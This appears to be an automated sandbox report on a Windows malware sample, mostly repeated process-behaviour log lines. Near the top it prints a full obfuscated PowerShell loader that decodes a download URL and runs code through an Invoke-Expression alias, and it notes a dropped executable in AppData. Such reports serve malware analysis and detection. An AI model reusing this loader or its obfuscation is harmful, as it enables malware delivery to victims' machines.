ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmJump to behavior
              Source: 31437F.exe.9.drStatic PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
              Source: 31437F.exe.9.drStatic PE information: section name: .didat
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_038459C8 pushad ; iretd 5_2_038459DE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07E10638 push eax; mov dword ptr [esp], ecx5_2_07E10AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07E18187 push FFFFFF8Bh; iretd 5_2_07E18189
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07E1811B push FFFFFF8Bh; iretd 5_2_07E1811D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07E11B73 push dword ptr [ebp+ebx-75h]; iretd 5_2_07E11B79
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07E10AB8 push eax; mov dword ptr [esp], ecx5_2_07E10AC4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\188E93\31437F.exeJump to dropped file
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
